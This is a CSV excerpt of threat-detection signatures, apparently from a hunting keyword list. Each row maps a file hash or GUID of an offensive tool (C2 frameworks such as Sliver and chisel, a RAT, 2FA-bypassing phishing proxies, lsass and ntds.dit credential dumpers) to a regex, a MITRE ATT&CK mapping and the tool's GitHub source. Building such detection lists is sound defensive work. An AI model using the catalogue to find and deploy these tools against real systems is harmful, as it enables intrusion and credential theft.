"*f5a5a21ee3a7dfaddae81cae7ef2df852cbfa44fdba51dfa0678a1c2d9d91c36*",".{0,1000}f5a5a21ee3a7dfaddae81cae7ef2df852cbfa44fdba51dfa0678a1c2d9d91c36.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*F5BIG-Scanner.py*",".{0,1000}F5BIG\-Scanner\.py.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z" "*f5cc1aeedb6a3e4a927ba5c1029c6075b2b9be7cf517cfdd8277bb0b00b5a60e*",".{0,1000}f5cc1aeedb6a3e4a927ba5c1029c6075b2b9be7cf517cfdd8277bb0b00b5a60e.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*f5cf5d30d16f2e4cd6deba19cbe539655e2d3c14002e47a35ef30ff6b795e5da*",".{0,1000}f5cf5d30d16f2e4cd6deba19cbe539655e2d3c14002e47a35ef30ff6b795e5da.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f5da690a8c9d7656d49401f2b54b3582197b81f6554eda0dc0bd511995db095c*",".{0,1000}f5da690a8c9d7656d49401f2b54b3582197b81f6554eda0dc0bd511995db095c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f5e85e80a5eb0184e26a3339871e5a5d0d4db497395f91c8305c018c51040912*",".{0,1000}f5e85e80a5eb0184e26a3339871e5a5d0d4db497395f91c8305c018c51040912.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f5ef714731d36549ad900a94888613cdcfdddaa07dfb4a56990b2326bfc4cac7*",".{0,1000}f5ef714731d36549ad900a94888613cdcfdddaa07dfb4a56990b2326bfc4cac7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f5efe627e03bc8128bc4a3a600774648f2bd9384fb8f146262ae6727133e8414*",".{0,1000}f5efe627e03bc8128bc4a3a600774648f2bd9384fb8f146262ae6727133e8414.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*F602DAFE-E8A2-4CB2-AF0E-656CD357D821*",".{0,1000}F602DAFE\-E8A2\-4CB2\-AF0E\-656CD357D821.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*F60C3246-D449-412B-A858-3B5E84494D1A*",".{0,1000}F60C3246\-D449\-412B\-A858\-3B5E84494D1A.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*F61EEB46-5352-4349-B880-E4A0B38EC0DB*",".{0,1000}F61EEB46\-5352\-4349\-B880\-E4A0B38EC0DB.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*f6324f8d7b34cbf7dd27366148d1a9923219187ea46c4d5c029ed3e37afd47bf*",".{0,1000}f6324f8d7b34cbf7dd27366148d1a9923219187ea46c4d5c029ed3e37afd47bf.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f639c47dde4c4e363129e6b9ca2610cc07c93265b5e47c773dcf54f5f4b08d7c*",".{0,1000}f639c47dde4c4e363129e6b9ca2610cc07c93265b5e47c773dcf54f5f4b08d7c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*f688df8c4a60bbb34467b8ef179a51f06af68b9861fa848d591df9c316a0c974*",".{0,1000}f688df8c4a60bbb34467b8ef179a51f06af68b9861fa848d591df9c316a0c974.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6898381e46e3d7b755f69c7e5dff72800a29a37ea707ec06c3c793437910dd4*",".{0,1000}f6898381e46e3d7b755f69c7e5dff72800a29a37ea707ec06c3c793437910dd4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6955930082d6cb41401cd02d95e0f79bf44f92918adc18bdbd5aef7207625d1*",".{0,1000}f6955930082d6cb41401cd02d95e0f79bf44f92918adc18bdbd5aef7207625d1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f6bb09ea48d85445fb1295a7b93ead6700a17c8f839624871f4faf024e18e39f*",".{0,1000}f6bb09ea48d85445fb1295a7b93ead6700a17c8f839624871f4faf024e18e39f.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*f6e0cfff7d80e0673848a96bc1e667c2716dec682c4f61156f83b070b9da8b4e*",".{0,1000}f6e0cfff7d80e0673848a96bc1e667c2716dec682c4f61156f83b070b9da8b4e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6e16eee3494ad168fa124552fba957ba8ddf8e7d96eedeef33f9e2afe1e9257*",".{0,1000}f6e16eee3494ad168fa124552fba957ba8ddf8e7d96eedeef33f9e2afe1e9257.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*f6e25a72071f1dcfc6f383a694cd1a8c1889560593abf02b45451c6c7a851aca*",".{0,1000}f6e25a72071f1dcfc6f383a694cd1a8c1889560593abf02b45451c6c7a851aca.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6e3f58333eee37bb52f603b1c8f9aa73d16ec2051f6349284d0f09c8847bb60*",".{0,1000}f6e3f58333eee37bb52f603b1c8f9aa73d16ec2051f6349284d0f09c8847bb60.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6efa1ba7a66dddb2a14a652d4f96f365c73e3b15f5f40822eefbff9fc46a57c*",".{0,1000}f6efa1ba7a66dddb2a14a652d4f96f365c73e3b15f5f40822eefbff9fc46a57c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*f6f65c22bb7a4f263d745b83a959cc8b295eadbc9f458afb437b716ad3fac833*",".{0,1000}f6f65c22bb7a4f263d745b83a959cc8b295eadbc9f458afb437b716ad3fac833.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f6f865390750822cea504855053b4fe017001235f63f628f8433dab6f3b15582*",".{0,1000}f6f865390750822cea504855053b4fe017001235f63f628f8433dab6f3b15582.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f724f2ad9e30f001e16034efa68757a3baf31fe918a71722b529a53f71c3bac0*",".{0,1000}f724f2ad9e30f001e16034efa68757a3baf31fe918a71722b529a53f71c3bac0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f7267a8880e45961219a6204a3a8ae5fff31e495f3f930e487f80cf89850f16f*",".{0,1000}f7267a8880e45961219a6204a3a8ae5fff31e495f3f930e487f80cf89850f16f.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*f7353868e1e35feb2bbd3a1b478698217a4cd06679fdb5dc8cc90f5232caa94b*",".{0,1000}f7353868e1e35feb2bbd3a1b478698217a4cd06679fdb5dc8cc90f5232caa94b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f745fdbab44bfd54a5997a5d8746a602eb3af30c10d3fd264edbc705a8bb6e2a*",".{0,1000}f745fdbab44bfd54a5997a5d8746a602eb3af30c10d3fd264edbc705a8bb6e2a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*F7581FB4-FAF5-4CD0-888A-B588F5BC69CD*",".{0,1000}F7581FB4\-FAF5\-4CD0\-888A\-B588F5BC69CD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*f7685768c93c8405a525090484261be417913ca2bcfdcce9596856dc3b5c64e0*",".{0,1000}f7685768c93c8405a525090484261be417913ca2bcfdcce9596856dc3b5c64e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f7851e5b0bca91e7ae15d879a7c5be4f63014c2c4b85bc756f6eddcf8c1eaa39*",".{0,1000}f7851e5b0bca91e7ae15d879a7c5be4f63014c2c4b85bc756f6eddcf8c1eaa39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f7b0550a05c30a38b721f15f90e84f104a3f98e3e8db7af96e5a98e7b79ecc11*",".{0,1000}f7b0550a05c30a38b721f15f90e84f104a3f98e3e8db7af96e5a98e7b79ecc11.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681*",".{0,1000}F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*f80dcd0195952b3bed5899824560e51e26cde9ec9974acbf1751d3ba845e5232*",".{0,1000}f80dcd0195952b3bed5899824560e51e26cde9ec9974acbf1751d3ba845e5232.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f8184ce6c3b95b88dda27b246cff8039986843082f8689081c97d59161bc878d*",".{0,1000}f8184ce6c3b95b88dda27b246cff8039986843082f8689081c97d59161bc878d.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*f82cb120b7c3c7ef03c656790fa81118e5e6cab286c458bdcc45220bbc5507dd*",".{0,1000}f82cb120b7c3c7ef03c656790fa81118e5e6cab286c458bdcc45220bbc5507dd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f841359414535455c39fc29a869f0d3f7e0299282699ece7a9d40389d921bba6*",".{0,1000}f841359414535455c39fc29a869f0d3f7e0299282699ece7a9d40389d921bba6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f844a6b49da27594cf1733faeebac268c7c790c48f8c5bb89dfc1bc7c20d1e76*",".{0,1000}f844a6b49da27594cf1733faeebac268c7c790c48f8c5bb89dfc1bc7c20d1e76.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*f86331a57befd87e3ea359578a7a8b526d924dd11cf629ce1f24f2626d107928*",".{0,1000}f86331a57befd87e3ea359578a7a8b526d924dd11cf629ce1f24f2626d107928.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f888e9662215d81edb90112d66c462e3ba47b9007efe21492e9c8d76909836c5*",".{0,1000}f888e9662215d81edb90112d66c462e3ba47b9007efe21492e9c8d76909836c5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*f88a7b4bbe98f4e4d0f9e4c2f4de2a448f13ed7783772e6f5d6881c18b324bb4*",".{0,1000}f88a7b4bbe98f4e4d0f9e4c2f4de2a448f13ed7783772e6f5d6881c18b324bb4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f891fa68159f087901b55f0109bdf40a39e312fc31fb9caafca22726798e7aeb*",".{0,1000}f891fa68159f087901b55f0109bdf40a39e312fc31fb9caafca22726798e7aeb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f89d5657f9c876889a0a1a0b5a7c599819d9cb731c529527af700c464b586bde*",".{0,1000}f89d5657f9c876889a0a1a0b5a7c599819d9cb731c529527af700c464b586bde.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f8a705f52d2b4587dfbf680d12d4b1af6d5ed91872257a756e2d5f4bdee24c45*",".{0,1000}f8a705f52d2b4587dfbf680d12d4b1af6d5ed91872257a756e2d5f4bdee24c45.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*",".{0,1000}F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" 